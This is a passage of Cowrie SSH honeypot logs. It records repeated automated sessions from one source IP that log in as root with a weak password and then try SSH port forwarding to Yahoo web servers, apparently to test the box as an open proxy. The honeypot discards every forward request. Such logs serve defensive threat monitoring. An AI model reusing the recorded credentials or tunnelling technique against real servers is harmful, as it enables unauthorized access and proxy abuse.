ijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.213065Z","src_ip":"213.209.150.239","session":"60d559413a26"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.496228Z","src_ip":"213.209.150.239","session":"60d559413a26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":11050,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:11050","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.554154Z","session":"60d559413a26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.611026Z","src_ip":"213.209.150.239","session":"60d559413a26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":4733,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4733","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.767138Z","session":"60d559413a26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.824051Z","src_ip":"213.209.150.239","session":"60d559413a26"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.882819Z","src_ip":"213.209.150.239","session":"60d559413a26"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45052,"dst_ip":"1.2.3.4","dst_port":22,"session":"a186d7c426bf","protocol":"ssh","message":"New connection: 213.209.150.239:45052 (1.2.3.4:22) [session: a186d7c426bf]","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.928879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.929643Z","src_ip":"213.209.150.239","session":"a186d7c426bf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.977041Z","src_ip":"213.209.150.239","session":"a186d7c426bf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.211829Z","src_ip":"213.209.150.239","session":"a186d7c426bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":102,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:102","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.259872Z","session":"a186d7c426bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.307171Z","src_ip":"213.209.150.239","session":"a186d7c426bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":13851,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13851","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.445614Z","session":"a186d7c426bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.492947Z","src_ip":"213.209.150.239","session":"a186d7c426bf"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.541116Z","src_ip":"213.209.150.239","session":"a186d7c426bf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45098,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f1d4d23b796","protocol":"ssh","message":"New connection: 213.209.150.239:45098 (1.2.3.4:22) [session: 5f1d4d23b796]","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.596679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.597479Z","src_ip":"213.209.150.239","session":"5f1d4d23b796"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.654281Z","src_ip":"213.209.150.239","session":"5f1d4d23b796"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.936338Z","src_ip":"213.209.150.239","session":"5f1d4d23b796"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":18019,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:18019","sensor":"my-vps","timestamp":"2025-08-26T01:07:03.995193Z","session":"5f1d4d23b796"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.052228Z","src_ip":"213.209.150.239","session":"5f1d4d23b796"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":482,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:482","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.207431Z","session":"5f1d4d23b796"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.264231Z","src_ip":"213.209.150.239","session":"5f1d4d23b796"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.322040Z","src_ip":"213.209.150.239","session":"5f1d4d23b796"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45164,"dst_ip":"1.2.3.4","dst_port":22,"session":"9635f08e0f70","protocol":"ssh","message":"New connection: 213.209.150.239:45164 (1.2.3.4:22) [session: 9635f08e0f70]","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.377864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.378915Z","src_ip":"213.209.150.239","session":"9635f08e0f70"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.435561Z","src_ip":"213.209.150.239","session":"9635f08e0f70"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.718218Z","src_ip":"213.209.150.239","session":"9635f08e0f70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17039,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17039","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.775976Z","session":"9635f08e0f70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.832849Z","src_ip":"213.209.150.239","session":"9635f08e0f70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":30688,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30688","sensor":"my-vps","timestamp":"2025-08-26T01:07:04.987207Z","session":"9635f08e0f70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.043940Z","src_ip":"213.209.150.239","session":"9635f08e0f70"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.101428Z","src_ip":"213.209.150.239","session":"9635f08e0f70"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45237,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fa3e7951fe6","protocol":"ssh","message":"New connection: 213.209.150.239:45237 (1.2.3.4:22) [session: 4fa3e7951fe6]","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.156977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.158296Z","src_ip":"213.209.150.239","session":"4fa3e7951fe6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.214855Z","src_ip":"213.209.150.239","session":"4fa3e7951fe6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.497494Z","src_ip":"213.209.150.239","session":"4fa3e7951fe6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":8578,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8578","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.555504Z","session":"4fa3e7951fe6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.612323Z","src_ip":"213.209.150.239","session":"4fa3e7951fe6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":5261,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5261","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.767047Z","session":"4fa3e7951fe6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.823711Z","src_ip":"213.209.150.239","session":"4fa3e7951fe6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.881629Z","src_ip":"213.209.150.239","session":"4fa3e7951fe6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45354,"dst_ip":"1.2.3.4","dst_port":22,"session":"7741be8e4284","protocol":"ssh","message":"New connection: 213.209.150.239:45354 (1.2.3.4:22) [session: 7741be8e4284]","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.927881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.928833Z","src_ip":"213.209.150.239","session":"7741be8e4284"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:05.975886Z","src_ip":"213.209.150.239","session":"7741be8e4284"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.211397Z","src_ip":"213.209.150.239","session":"7741be8e4284"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":1938,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:1938","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.259383Z","session":"7741be8e4284"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.306760Z","src_ip":"213.209.150.239","session":"7741be8e4284"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":1022,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1022","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.445603Z","session":"7741be8e4284"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.492876Z","src_ip":"213.209.150.239","session":"7741be8e4284"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:06.541015Z","src_ip":"213.209.150.239","session":"7741be8e4284"}
